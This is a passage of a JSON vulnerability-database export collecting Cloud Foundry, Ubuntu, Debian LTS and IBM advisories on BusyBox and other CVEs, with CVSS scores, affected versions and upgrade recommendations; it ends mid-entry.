This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2017-16544)\n\nIt was discovered that the BusyBox wget utility incorrectly handled certain responses. A remote attacker could use this issue to cause BusyBox to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2018-1000517)\n\nIt was discovered that the BusyBox DHCP utilities incorrectly handled certain memory operations. A remote attacker could possibly use this issue to access sensitive information. (CVE-2018-20679, CVE-2019-5747)\n\nCVEs contained in this USN include: CVE-2011-5325, CVE-2014-9645, CVE-2015-9261, CVE-2016-2147, CVE-2016-2148, CVE-2017-15873, CVE-2017-16544, CVE-2018-1000517, CVE-2018-20679, CVE-2019-5747\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * Cloud Foundry BOSH trusty-stemcells are vulnerable, including: \n * 3586.x versions prior to 3586.96\n * 3541.x versions prior to 3541.93\n * 3468.x versions prior to 3468.109\n * 3445.x versions prior to 3445.107\n * 3421.x versions prior to 3421.124\n * All other stemcells not listed.\n * Cloud Foundry BOSH xenial-stemcells are vulnerable, including: \n * 170.x versions prior to 170.9\n * 97.x versions prior to 97.74\n * All other stemcells not listed.\n * All versions of Cloud Foundry cflinuxfs2 prior to 1.278.0\n * All versions of Cloud Foundry cflinuxfs3 prior to 0.76.0\n\n# Mitigation\n\nUsers of affected products are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH trusty-stemcells: \n * Upgrade 3586.x versions to 3586.96\n * Upgrade 3541.x versions to 3541.93\n * Upgrade 3468.x versions to 3468.109\n * Upgrade 3445.x versions to 3445.107\n * Upgrade 3421.x versions to 3421.124\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-trusty>).\n * The Cloud Foundry project recommends upgrading the following BOSH xenial-stemcells: \n * Upgrade 170.x versions to 170.9\n * Upgrade 97.x versions to 97.74\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-xenial>).\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 version 1.278.0 or later.\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs3 version 0.76.0 or later.\n\n# References\n\n * [USN-3935-1](<https://usn.ubuntu.com/3935-1>)\n * [CVE-2011-5325](<https://people.canonical.com/~ubuntu-security/cve/CVE-2011-5325>)\n * [CVE-2014-9645](<https://people.canonical.com/~ubuntu-security/cve/CVE-2014-9645>)\n * [CVE-2015-9261](<https://people.canonical.com/~ubuntu-security/cve/CVE-2015-9261>)\n * [CVE-2016-2147](<https://people.canonical.com/~ubuntu-security/cve/CVE-2016-2147>)\n * [CVE-2016-2148](<https://people.canonical.com/~ubuntu-security/cve/CVE-2016-2148>)\n * [CVE-2017-15873](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-15873>)\n * [CVE-2017-16544](<https://people.canonical.com/~ubuntu-security/cve/CVE-2017-16544>)\n * [CVE-2018-1000517](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-1000517>)\n * [CVE-2018-20679](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-20679>)\n * [CVE-2019-5747](<https://people.canonical.com/~ubuntu-security/cve/CVE-2019-5747>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-04-12T00:00:00", "type": "cloudfoundry", "title": "USN-3935-1: BusyBox vulnerabilities | Cloud Foundry", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5747", "CVE-2015-9261", "CVE-2014-9645", "CVE-2016-2147", "CVE-2017-16544", "CVE-2017-15873", "CVE-2018-1000517", "CVE-2016-2148", "CVE-2011-5325", "CVE-2018-20679"], "modified": "2019-04-12T00:00:00", "id": "CFOUNDRY:A2C1214772F351A51ABA0A47D3042A74", "href": "https://www.cloudfoundry.org/blog/usn-3935-1/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2022-01-04T11:46:18", "description": "Tyler Hicks discovered that BusyBox incorrectly handled symlinks inside tar \narchives. If a user or automated system were tricked into processing a \nspecially crafted tar archive, a remote attacker could overwrite arbitrary \nfiles outside of the current directory. This issue only affected Ubuntu \n14.04 LTS and Ubuntu 16.04 LTS. (CVE-2011-5325)\n\nMathias Krause discovered that BusyBox incorrectly handled kernel module \nloading restrictions. A local attacker could possibly use this issue to \nbypass intended restrictions. This issue only affected Ubuntu 14.04 LTS. \n(CVE-2014-9645)\n\nIt was discovered that BusyBox incorrectly handled certain ZIP archives. If \na user or automated system were tricked into processing a specially crafted \nZIP archive, a remote attacker could cause BusyBox to crash, leading to a \ndenial of service. This issue only affected Ubuntu 14.04 LTS and Ubuntu \n16.04 LTS. (CVE-2015-9261)\n\nNico Golde discovered that the BusyBox DHCP client incorrectly handled \ncertain malformed domain names. A remote attacker could possibly use this \nissue to cause the DHCP client to crash, leading to a denial of service. \nThis issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. \n(CVE-2016-2147)\n\nNico Golde discovered that the BusyBox DHCP client incorrectly handled \ncertain 6RD options. A remote attacker could use this issue to cause the \nDHCP client to crash, leading to a denial of service, or possibly execute \narbitrary code. This issue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 \nLTS. (CVE-2016-2148)\n\nIt was discovered that BusyBox incorrectly handled certain bzip2 archives. \nIf a user or automated system were tricked into processing a specially \ncrafted bzip2 archive, a remote attacker could cause BusyBox to crash, \nleading to a denial of service, or possibly execute arbitrary code. This \nissue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2017-15873)\n\nIt was discovered that BusyBox incorrectly handled tab completion. A local \nattacker could possibly use this issue to execute arbitrary code. This \nissue only affected Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. (CVE-2017-16544)\n\nIt was discovered that the BusyBox wget utility incorrectly handled certain \nresponses. A remote attacker could use this issue to cause BusyBox to \ncrash, resulting in a denial of service, or possibly execute arbitrary \ncode. (CVE-2018-1000517)\n\nIt was discovered that the BusyBox DHCP utilities incorrectly handled \ncertain memory operations. A remote attacker could possibly use this issue \nto access sensitive information. (CVE-2018-20679, CVE-2019-5747)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-04-03T00:00:00", "type": "ubuntu", "title": "BusyBox vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-5325", "CVE-2018-20679", "CVE-2016-2148", "CVE-2017-15873", "CVE-2019-5747", "CVE-2016-2147", "CVE-2018-1000517", "CVE-2015-9261", "CVE-2017-16544", "CVE-2014-9645"], "modified": "2019-04-03T00:00:00", "id": "USN-3935-1", "href": "https://ubuntu.com/security/notices/USN-3935-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-10-22T10:46:15", "description": "-------------------------------------------------------------------------\nDebian LTS Advisory DLA-2559-1 debian-lts@lists.debian.org\nhttps://www.debian.org/lts/security/ Markus Koschany\nFebruary 15, 2021 https://wiki.debian.org/LTS\n-------------------------------------------------------------------------\n\nPackage : busybox\nVersion : 1:1.22.0-19+deb9u1\nCVE ID : CVE-2011-5325 CVE-2015-9261 CVE-2016-2147 CVE-2016-2148 \n CVE-2017-15873 CVE-2017-16544 CVE-2018-1000517\nDebian Bug : 902724 882258 879732 818497 818499 803097 802702\n\nBusybox, utility programs for small and embedded systems, was affected\nby several security vulnerabilities. The Common Vulnerabilities and\nExposures project identifies the following issues.\n\nCVE-2011-5325\n\n A path traversal vulnerability was found in Busybox implementation\n of tar. tar will extract a symlink that points outside of the\n current working directory and then follow that symlink when\n extracting other files. This allows for a directory traversal\n attack when extracting untrusted tarballs.\n\nCVE-2013-1813\n\n When device node or symlink in /dev should be created inside\n 2-or-deeper subdirectory (/dev/dir1/dir2.../node), the intermediate\n directories are created with incorrect permissions.\n\nCVE-2014-4607\n\n An integer overflow may occur when processing any variant of a\n &quot;literal run&quot; in the lzo1x_decompress_safe function. Each of these\n three locations is subject to an integer overflow when processing\n zero bytes. This exposes the code that copies literals to memory\n corruption.\n\nCVE-2014-9645\n\n The add_probe function in modutils/modprobe.c in BusyBox allows\n local users to bypass intended restrictions on loading kernel\n modules via a / (slash) character in a module name, as demonstrated\n by an &quot;ifconfig /usbserial up&quot; command or a &quot;mount -t /snd_pcm none\n /&quot; command.\n\nCVE-2016-2147\n\n Integer overflow in the DHCP client (udhcpc) in BusyBox allows\n remote attackers to cause a denial of service (crash) via a\n malformed RFC1035-encoded domain name, which triggers an\n out-of-bounds heap write.\n\nCVE-2016-2148\n\n Heap-based buffer overflow in the DHCP client (udhcpc) in BusyBox\n allows remote attackers to have unspecified impact via vectors\n involving OPTION_6RD parsing.\n\nCVE-2017-15873\n\n The get_next_block function in archival/libarchive\n /decompress_bunzip2.c in BusyBox has an Integer Overflow that may\n lead to a write access violation.\n\nCVE-2017-16544\n\n In the add_match function in libbb/lineedit.c in BusyBox, the tab\n autocomplete feature of the shell, used to get a list of filenames\n in a directory, does not sanitize filenames and results in executing\n any escape sequence in the terminal. This could potentially result\n in code execution, arbitrary file writes, or other attacks.\n\nCVE-2018-1000517\n\n BusyBox contains a Buffer Overflow vulnerability in\n Busybox wget that can result in a heap-based buffer overflow.\n This attack appears to be exploitable via network connectivity.\n\nCVE-2015-9621\n\n Unziping a specially crafted zip file results in a computation of an\n invalid pointer and a crash reading an invalid address.\n\nFor Debian 9 stretch, these problems have been fixed in version\n1:1.22.0-19+deb9u1.\n\nWe recommend that you upgrade your busybox packages.\n\nFor the detailed security status of busybox please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/busybox\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\nAttachment:\nsignature.asc\nDescription: This is a digitally signed message part\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-15T11:56:52", "type": "debian", "title": "[SECURITY] [DLA 2559-1] busybox security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-5325", "CVE-2013-1813", "CVE-2014-4607", "CVE-2014-9645", "CVE-2015-9261", "CVE-2015-9621", "CVE-2016-2147", "CVE-2016-2148", "CVE-2017-15873", "CVE-2017-16544", "CVE-2018-1000517"], "modified": "2021-02-15T11:56:52", "id": "DEBIAN:DLA-2559-1:C6843", "href": "https://lists.debian.org/debian-lts-announce/2021/02/msg00020.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T13:41:18", "description": "Package : busybox\nVersion : 1:1.22.0-9+deb8u2\nCVE ID : CVE-2011-5325 CVE-2014-9645 CVE-2015-9261 CVE-2016-2147\n CVE-2016-2148 CVE-2017-15873 CVE-2017-16544\n CVE-2018-1000517\nDebian Bug : 902724 882258 879732 818497 818499 803097 802702\n\nBusybox, utility programs for small and embedded systems, was affected\nby several security vulnerabilities. The Common Vulnerabilities and\nExposures project identifies the following issues.\n\nCVE-2011-5325\n\n A path traversal vulnerability was found in Busybox implementation\n of tar. tar will extract a symlink that points outside of the\n current working directory and then follow that symlink when\n extracting other files. This allows for a directory traversal\n attack when extracting untrusted tarballs.\n\nCVE-2013-1813\n\n When device node or symlink in /dev should be created inside\n 2-or-deeper subdirectory (/dev/dir1/dir2.../node), the intermediate\n directories are created with incorrect permissions.\n\nCVE-2014-4607\n\n An integer overflow may occur when processing any variant of a\n &quot;literal run&quot; in the lzo1x_decompress_safe function. Each of these\n three locations is subject to an integer overflow when processing\n zero bytes. This exposes the code that copies literals to memory\n corruption.\n\nCVE-2014-9645\n\n The add_probe function in modutils/modprobe.c in BusyBox allows\n local users to bypass intended restrictions on loading kernel\n modules via a / (slash) character in a module name, as demonstrated\n by an &quot;ifconfig /usbserial up&quot; command or a &quot;mount -t /snd_pcm none\n /&quot; command.\n\nCVE-2016-2147\n\n Integer overflow in the DHCP client (udhcpc) in BusyBox allows\n remote attackers to cause a denial of service (crash) via a\n malformed RFC1035-encoded domain name, which triggers an\n out-of-bounds heap write.\n\nCVE-2016-2148\n\n Heap-based buffer overflow in the DHCP client (udhcpc) in BusyBox\n allows remote attackers to have unspecified impact via vectors\n involving OPTION_6RD parsing.\n\nCVE-2017-15873\n\n The get_next_block function in archival/libarchive\n /decompress_bunzip2.c in BusyBox has an Integer Overflow that may\n lead to a write access violation.\n\nCVE-2017-16544\n\n In the add_match function in libbb/lineedit.c in BusyBox, the tab\n autocomplete feature of the shell, used to get a list of filenames\n in a directory, does not sanitize filenames and results in executing\n any escape sequence in the terminal. This could potentially result\n in code execution, arbitrary file writes, or other attacks.\n\nCVE-2018-1000517\n\n BusyBox contains a Buffer Overflow vulnerability in\n Busybox wget that can result in a heap-based buffer overflow.\n This attack appears to be exploitable via network connectivity.\n\nCVE-2015-9621\n\n Unziping a specially crafted zip file results in a computation of an\n invalid pointer and a crash reading an invalid address.\n\nFor Debian 8 &quot;Jessie&quot;, these problems have been fixed in version\n1:1.22.0-9+deb8u2.\n\nWe recommend that you upgrade your busybox packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-07-27T04:39:37", "type": "debian", "title": "[SECURITY] [DLA 1445-1] busybox security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-5325", "CVE-2013-1813", "CVE-2014-4607", "CVE-2014-9645", "CVE-2015-9261", "CVE-2015-9621", "CVE-2016-2147", "CVE-2016-2148", "CVE-2017-15873", "CVE-2017-16544", "CVE-2018-1000517"], "modified": "2018-07-27T04:39:37", "id": "DEBIAN:DLA-1445-1:1C330", "href": "https://lists.debian.org/debian-lts-announce/2018/07/msg00037.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-10T05:29:30", "description": "Package : busybox\nVersion : 1:1.22.0-9+deb8u2\nCVE ID : CVE-2011-5325 CVE-2014-9645 CVE-2015-9261 CVE-2016-2147\n CVE-2016-2148 CVE-2017-15873 CVE-2017-16544\n CVE-2018-1000517\nDebian Bug : 902724 882258 879732 818497 818499 803097 802702\n\nBusybox, utility programs for small and embedded systems, was affected\nby several security vulnerabilities. The Common Vulnerabilities and\nExposures project identifies the following issues.\n\nCVE-2011-5325\n\n A path traversal vulnerability was found in Busybox implementation\n of tar. tar will extract a symlink that points outside of the\n current working directory and then follow that symlink when\n extracting other files. This allows for a directory traversal\n attack when extracting untrusted tarballs.\n\nCVE-2013-1813\n\n When device node or symlink in /dev should be created inside\n 2-or-deeper subdirectory (/dev/dir1/dir2.../node), the intermediate\n directories are created with incorrect permissions.\n\nCVE-2014-4607\n\n An integer overflow may occur when processing any variant of a\n &quot;literal run&quot; in the lzo1x_decompress_safe function. Each of these\n three locations is subject to an integer overflow when processing\n zero bytes. This exposes the code that copies literals to memory\n corruption.\n\nCVE-2014-9645\n\n The add_probe function in modutils/modprobe.c in BusyBox allows\n local users to bypass intended restrictions on loading kernel\n modules via a / (slash) character in a module name, as demonstrated\n by an &quot;ifconfig /usbserial up&quot; command or a &quot;mount -t /snd_pcm none\n /&quot; command.\n\nCVE-2016-2147\n\n Integer overflow in the DHCP client (udhcpc) in BusyBox allows\n remote attackers to cause a denial of service (crash) via a\n malformed RFC1035-encoded domain name, which triggers an\n out-of-bounds heap write.\n\nCVE-2016-2148\n\n Heap-based buffer overflow in the DHCP client (udhcpc) in BusyBox\n allows remote attackers to have unspecified impact via vectors\n involving OPTION_6RD parsing.\n\nCVE-2017-15873\n\n The get_next_block function in archival/libarchive\n /decompress_bunzip2.c in BusyBox has an Integer Overflow that may\n lead to a write access violation.\n\nCVE-2017-16544\n\n In the add_match function in libbb/lineedit.c in BusyBox, the tab\n autocomplete feature of the shell, used to get a list of filenames\n in a directory, does not sanitize filenames and results in executing\n any escape sequence in the terminal. This could potentially result\n in code execution, arbitrary file writes, or other attacks.\n\nCVE-2018-1000517\n\n BusyBox contains a Buffer Overflow vulnerability in\n Busybox wget that can result in a heap-based buffer overflow.\n This attack appears to be exploitable via network connectivity.\n\nCVE-2015-9621\n\n Unziping a specially crafted zip file results in a computation of an\n invalid pointer and a crash reading an invalid address.\n\nFor Debian 8 &quot;Jessie&quot;, these problems have been fixed in version\n1:1.22.0-9+deb8u2.\n\nWe recommend that you upgrade your busybox packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-07-27T04:39:37", "type": "debian", "title": "[SECURITY] [DLA 1445-1] busybox security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-5325", "CVE-2013-1813", "CVE-2014-4607", "CVE-2014-9645", "CVE-2015-9261", "CVE-2015-9621", "CVE-2016-2147", "CVE-2016-2148", "CVE-2017-15873", "CVE-2017-16544", "CVE-2018-1000517"], "modified": "2018-07-27T04:39:37", "id": "DEBIAN:DLA-1445-1:15231", "href": "https://lists.debian.org/debian-lts-announce/2018/07/msg00037.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ibm": [{"lastseen": "2021-12-30T21:40:44", "description": "## Summary\n\nIBM Cloud Private is vulnerable to multiple security vulnerabilities\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-5146](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5146>) \n**DESCRIPTION:** libvorbis, as used in Mozilla Firefox, could allow a remote attacker to execute arbitrary code on the system, caused by an out-of-bounds memory write. By persuading a victim to open a specially-crafted media file, an attacker could exploit this vulnerability to execute arbitrary code on the system or cause the browser to crash. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/140404> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2017-15422](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15422>) \n**DESCRIPTION:** Google Chrome could allow a remote attacker to execute arbitrary code on the system, caused by an integer overflow in ICU. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \nCVSS Base Score: 6.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/136054> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L)\n\n**CVEID:** [CVE-2017-15412](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15412>) \n**DESCRIPTION:** Google Chrome could allow a remote attacker to execute arbitrary code on the system, caused by a use-after-free in libXML. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \nCVSS Base Score: 6.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/136046> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L)\n\n**CVEID:** [CVE-2017-7526](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7526>) \n**DESCRIPTION:** Libgcrypt could allow a remote attacker to obtain sensitive information, caused by a cache side-channel attack when using left-to-right sliding window method by the RSA-1024 implementation. By running arbitrary software where the private key is used, an attacker could exploit this vulnerability to obtain the RSA private key. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/128271> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N)\n\n**CVEID:** [CVE-2018-1000122](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000122>) \n**DESCRIPTION:** curl could allow a remote attacker to obtain sensitive information, caused by a buffer over-read in the RTSP+RTP handling code. An attacker could exploit this vulnerability to obtain sensitive information or cause a denial of service. \nCVSS Base Score: 6.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/140316> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L)\n\n**CVEID:** [CVE-2018-0739](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0739>) \n**DESCRIPTION:** OpenSSL is vulnerable to a denial of service. By sending specially crafted ASN.1 data with a recursive definition, a remote attacker could exploit this vulnerability to consume excessive stack memory. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/140847> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n**CVEID:** [CVE-2018-0733](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0733>) \n**DESCRIPTION:** OpenSSL could allow a remote attacker to bypass security restrictions, caused by the failure to properly compare byte values by the PA-RISC CRYPTO_memcmp() function used on HP-UX PA-RISC targets. An attacker could exploit this vulnerability to forge messages, some of which may be authenticated. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/140849> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n**CVEID:** [CVE-2017-17512](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17512>) \n**DESCRIPTION:** sensible-utils package for Debian could allow a remote attacker to execute arbitrary commands on the system, caused by the failure to validate strings before launching the program specified by the BROWSER environment variable in sensible-browser. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/136182> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2017-17426](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17426>) \n**DESCRIPTION:** GNU C Library (aka glibc or libc6) is vulnerable to a heap-based buffer overflow, caused by an integer overflow in the per-thread cache (aka tcache) feature. By allocating an object whose size is close to SIZE_MAX, a remote attacker could overflow a buffer and execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/135985> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2017-16612](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16612>) \n**DESCRIPTION:** X.Org libXcursor is vulnerable to a heap-based buffer overflow, caused by various integer overflows. By sending specially-crafted cursors with programs like GIMP, a remote attacker could overflow a buffer and execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/135813> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [CVE-2017-16546](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16546>) \n**DESCRIPTION:** ImageMagick is vulnerable to a denial of service, caused by improper validation of the colormap index in a WPG palette in the ReadWPGImage function in coders/wpg.c. By persuading a victim to open a specially-crafted file, a remote attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base Score: 5.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/134498> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)\n\n**CVEID:** [CVE-2017-1000117](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000117>) \n**DESCRIPTION:** Git could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by improper handling of the \"ssh\" URLs. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/130244> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2017-1000116](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000116>) \n**DESCRIPTION:** Mercurial could allow a 